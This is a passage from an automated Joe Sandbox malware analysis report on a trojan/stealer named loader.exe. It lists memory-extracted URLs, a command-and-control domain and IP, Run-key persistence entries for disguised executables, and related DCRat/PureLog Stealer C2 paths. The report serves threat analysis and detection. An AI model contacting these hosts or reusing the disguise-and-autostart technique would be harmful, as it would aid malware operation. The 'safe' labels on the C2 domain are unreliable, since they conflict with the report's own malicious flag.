                                      https://ac.ecosia.org/autocomplete?q=RuntimeBroker.exe, 00000011.00000002.3463672667.00000000149BB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013648000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000145EB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013B63000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014183000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013939000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013ACB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014922000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001473A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014552000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013E4B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014B0A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014BA3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001421B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000147D3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013DB3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001436B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014033000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013F9B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014403000.00000004.00000800.00020000.00000000.sdmp, ILsVoJuzGv.17.drfalse
                                        		high
                                        https://duckduckgo.com/chrome_newtabRuntimeBroker.exe, 00000011.00000002.3463672667.00000000149BB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013648000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000145EB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013B63000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014183000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013939000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013ACB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014922000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001473A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014552000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013E4B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014B0A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014BA3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001421B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000147D3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013DB3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001436B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014033000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013F9B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014403000.00000004.00000800.00020000.00000000.sdmp, ILsVoJuzGv.17.drfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=RuntimeBroker.exe, 00000011.00000002.3463672667.00000000149BB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013648000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000145EB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013B63000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014183000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013939000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013ACB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014922000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001473A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014552000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013E4B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014B0A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014BA3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001421B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000147D3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013DB3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001436B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014033000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013F9B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014403000.00000004.00000800.00020000.00000000.sdmp, ILsVoJuzGv.17.drfalse
                                            		high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoRuntimeBroker.exe, 00000011.00000002.3463672667.00000000149BB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013648000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000145EB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013B63000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014183000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013939000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013ACB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014922000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001473A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014552000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013E4B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014B0A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014BA3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001421B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000147D3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013DB3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001436B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014033000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013F9B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014403000.00000004.00000800.00020000.00000000.sdmp, ILsVoJuzGv.17.drfalse
                                              		high
                                              http://373292cm.nyashka.topRuntimeBroker.exe, 00000011.00000002.3435800974.0000000003970000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRuntimeBroker.exe, 00000011.00000002.3463672667.00000000149BB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013648000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000145EB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013B63000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014183000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013939000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013ACB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014922000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001473A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014552000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013E4B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014B0A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014BA3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001421B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000147D3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013DB3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001436B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014033000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013F9B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014403000.00000004.00000800.00020000.00000000.sdmp, ILsVoJuzGv.17.drfalse
                                                		high
                                                http://www.enigmaprotector.com/openUloader.exe, 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpfalse
                                                  		high
                                                  http://373292cm.nyPRuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RuntimeBroker.exe, 00000011.00000002.3463672667.00000000149BB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013648000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000145EB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013B63000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014183000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013939000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013ACB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014922000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001473A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014552000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013E4B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014B0A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014BA3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001421B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000147D3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013DB3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001436B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014033000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013F9B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014403000.00000004.00000800.00020000.00000000.sdmp, ILsVoJuzGv.17.drfalse
                                                    		high
                                                    http://373292cm.nyashka.top/RuntimeBroker.exe, 00000011.00000002.3435800974.00000000037B4000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RuntimeBroker.exe, 00000011.00000002.3463672667.00000000149BB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013648000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000145EB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013B63000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014183000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013939000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013ACB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014922000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001473A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014552000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013E4B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014B0A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014BA3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001421B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000147D3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013DB3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001436B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014033000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013F9B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014403000.00000004.00000800.00020000.00000000.sdmp, ILsVoJuzGv.17.drfalse
                                                      		high
                                                      http://373292cm.nyPRRuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.enigmaprotector.com/loader.exe, 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmp, loader.exe, 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpfalse
                                                        		high
                                                        https://www.ecosia.org/newtab/RuntimeBroker.exe, 00000011.00000002.3463672667.00000000149BB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013648000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000145EB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013B63000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014183000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013939000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013ACB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014922000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001473A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014552000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013E4B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014B0A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014BA3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001421B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000147D3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013DB3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001436B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014033000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013F9B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014403000.00000004.00000800.00020000.00000000.sdmp, ILsVoJuzGv.17.drfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namechainPorthostCommon.exe, 00000005.00000002.2352626856.000000000319A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.00000000037B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RuntimeBroker.exe, 00000011.00000002.3463672667.00000000149BB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013648000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000145EB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013B63000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014183000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013939000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013ACB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014922000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001473A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014552000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013E4B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014B0A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014BA3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001421B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000147D3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013DB3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001436B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014033000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013F9B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014403000.00000004.00000800.00020000.00000000.sdmp, ILsVoJuzGv.17.drfalse
                                                              		high

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              37.44.238.250
                                                              		373292cm.nyashka.topFrance
                                                              		49434HARMONYHOSTING-ASFRtrue

                                                              General Information

                                                              Joe Sandbox version:42.0.0 Malachite
                                                              Analysis ID:1588885
                                                              Start date and time:2025-01-11 06:41:52 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 9m 46s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:27
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:loader.exe
                                                              Detection:MAL
                                                              Classification:mal100.spre.troj.spyw.expl.evad.winEXE@35/291@2/1
                                                              EGA Information:
                                                              • Successful, ratio: 20%
                                                              HCA Information:Failed
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53, 184.28.90.27
                                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target RuntimeBroker.exe, PID 6008 because it is empty
                                                              • Execution Graph export aborted for target chainPorthostCommon.exe, PID 2884 because it is empty
                                                              • Execution Graph export aborted for target conhost.exe, PID 1488 because it is empty
                                                              • Execution Graph export aborted for target conhost.exe, PID 4024 because it is empty
                                                              • Execution Graph export aborted for target dasHost.exe, PID 3404 because it is empty
                                                              • Execution Graph export aborted for target dasHost.exe, PID 5872 because it is empty
                                                              • Execution Graph export aborted for target tQESKTdysPpsVzUyXTE.exe, PID 2360 because it is empty
                                                              • Execution Graph export aborted for target tQESKTdysPpsVzUyXTE.exe, PID 5132 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                              • Report size getting too big, too many NtOpenKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              00:43:14API Interceptor370991x Sleep call for process: RuntimeBroker.exe modified
                                                              06:43:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\LiveKernelReports\RuntimeBroker.exe"
                                                              06:43:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Program Files (x86)\microsoft\csrss.exe"
                                                              06:43:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dasHost "C:\Windows\DiagTrack\Scenarios\dasHost.exe"
                                                              06:43:39AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Recovery\conhost.exe"
                                                              06:43:47AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run tQESKTdysPpsVzUyXTE "C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe"
                                                              06:43:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run chainPorthostCommon "C:\ServerWinRuntimeBroker\chainPorthostCommon.exe"
                                                              06:44:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\LiveKernelReports\RuntimeBroker.exe"
                                                              06:44:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Program Files (x86)\microsoft\csrss.exe"
                                                              06:44:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dasHost "C:\Windows\DiagTrack\Scenarios\dasHost.exe"
                                                              06:44:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Recovery\conhost.exe"
                                                              06:44:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run tQESKTdysPpsVzUyXTE "C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe"
                                                              06:44:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run chainPorthostCommon "C:\ServerWinRuntimeBroker\chainPorthostCommon.exe"
                                                              06:44:53AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\LiveKernelReports\RuntimeBroker.exe"
                                                              06:45:02AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Program Files (x86)\microsoft\csrss.exe"

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              37.44.238.250PlZA6b48MW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 505905cm.n9shka.top/imagePollLinuxCentral.php
                                                              r6cRyCpdfS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 321723cm.renyash.ru/AuthdbBasetraffic.php
                                                              cbCjTbodwa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • whware.top/RequestLowGeoLongpollWordpress.php
                                                              vb8DOBZQ4X.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 228472cm.n9shka.top/PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php
                                                              8k1e14tjcx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 703648cm.renyash.top/provider_cpugame.php
                                                              4si9noTBNw.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 306039cm.nyashcrack.top/geoGeneratorwordpresswpprivatetempDownloads.php
                                                              Qsi7IgkrWa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.php
                                                              4Awb1u1GcJ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 143840cm.nyashteam.ru/DefaultPublic.php
